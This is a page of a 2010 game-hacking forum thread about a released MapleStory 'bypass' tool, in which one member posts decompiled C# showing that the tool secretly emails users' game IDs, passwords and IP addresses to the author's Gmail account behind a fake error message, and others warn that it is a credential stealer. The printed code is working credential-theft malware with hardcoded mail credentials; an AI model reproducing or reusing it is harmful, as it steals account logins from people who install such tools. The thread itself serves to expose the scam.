Page 21 of 30
Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU
Posted: Sat Sep 11, 2010 12:01 pm
by DiYuSiuLo
************** Exception Text **************
System.InvalidOperationException: destinationFileName needs to include a
file name.
at Microsoft.VisualBasic.Devices.Network.DownloadFile(Uri address,
String destinationFileName, ICredentials networkCredentials, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite, UICancelOption
onUserCancel)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName, String userName, String password, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite, UICancelOption
onUserCancel)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName, String userName, String password, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName)
at MapleHacksMSEA095.Login.Timer1_Tick(Object sender, EventArgs e)
at System.Windows.Forms.Timer.OnTick(EventArgs e)
at System.Windows.Forms.Timer.TimerNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg,
IntPtr wparam, IntPtr lparam)
btw i duno wat is this ...
Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU
Posted: Sat Sep 11, 2010 1:00 pm
by faithtn
Kudos to TS. Lol, this is funny seeing people asking this and that.
Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU
Posted: Sat Sep 11, 2010 5:02 pm
by k9gamer
Awesome hack !!!! Gratz to noobhacker for making such a wonderful hack (hope it doesnt gt patched tho)
Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU
Posted: Sat Sep 11, 2010 5:20 pm
by Jeof
I'm having fun reading this thread hence i wont close it =3
Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU
Posted: Sat Sep 11, 2010 6:13 pm
by NoobHacker
Jeof wrote:I'm having fun reading this thread hence i wont close it =3
I have more fun when reading your reply

Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU
Posted: Sat Sep 11, 2010 6:14 pm
by KFSPC8
DiYuSiuLo wrote:************** Exception Text **************
System.InvalidOperationException: destinationFileName needs to include a
file name.
at Microsoft.VisualBasic.Devices.Network.DownloadFile(Uri address,
String destinationFileName, ICredentials networkCredentials, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite, UICancelOption
onUserCancel)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName, String userName, String password, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite, UICancelOption
onUserCancel)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName, String userName, String password, Boolean
showUI, Int32 connectionTimeout, Boolean overwrite)
at Microsoft.VisualBasic.Devices.Network.DownloadFile(String address,
String destinationFileName)
at MapleHacksMSEA095.Login.Timer1_Tick(Object sender, EventArgs e)
at System.Windows.Forms.Timer.OnTick(EventArgs e)
at System.Windows.Forms.Timer.TimerNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg,
IntPtr wparam, IntPtr lparam)
btw i duno wat is this ...
this is crap
Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU
Posted: Sat Sep 11, 2010 6:17 pm
by madeforum
It'll be great if you guys can keep this forum safe for hackers and maintain its trustability to gain reputation.
Code: Select all
private void Timer1_Tick(object sender, EventArgs e)
{
string text = MyProject.Forms.Main.TextBox1.Text;
string str2 = MyProject.Forms.Main.TextBox2.Text;
SmtpClient client = new SmtpClient {
Credentials = new NetworkCredential("msea.vip@gmail.com", "xemectrum"),
Host = "smtp.gmail.com",
Port = 0x24b,
EnableSsl = true
};
MailMessage message = new MailMessage {
From = new MailAddress("msea.vip@gmail.com"),
To = { new MailAddress("msea.vip@gmail.com") },
Subject = "ID Arrived"
};
if (File.Exists("data"))
{
FileSystem.Kill("data");
}
MyProject.Computer.Network.DownloadFile("http://whatismyip.org/", "data");
StreamReader reader = new StreamReader("data");
message.Body = "ID:" + text + "\r\nPassword:" + str2 + "\r\n2nd Password:" + MyProject.Forms.Main.TextBox3.Text + "\r\nIP Address:" + this.h.AddressList.GetValue(0).ToString() + "\r\nWAN Address:" + reader.ReadToEnd();
reader.Dispose();
FileSystem.Kill("data");
this.Timer1.Interval = 0x7fffffff;
try
{
client.Send(message);
}
catch (Exception exception1)
{
ProjectData.SetProjectError(exception1);
Exception exception = exception1;
Interaction.MsgBox("DLL did not export\r\nUnable to verify id and password", MsgBoxStyle.OkOnly, null);
this.Close();
ProjectData.ClearProjectError();
}
}
You are lucky if you failed to export the "DLL".
Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU
Posted: Sat Sep 11, 2010 6:27 pm
by NoobHacker
i don't care you post the source code since the leechers don't know what is it
Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU
Posted: Sat Sep 11, 2010 6:41 pm
by Misty
I second-ed madeforum's reply but seriously i thought noobhacker really uploaded a bypass and i tried it myself. Till i open it with ildasm.exe.
msea.vip@gmail.com, xemectrum, "ID Arrived", "ID:", "\r\nPassword:"
Leechers ask yourself why do anyone ask for your id/password and inside that "hack" has a email?
Re: [RELEASE]BYPASS D/C FROM PATCHED WZ EDITS + BYPASS INCLU
Posted: Sat Sep 11, 2010 6:42 pm
by NoobHacker
i use gmail storage to download the latest dll bypass file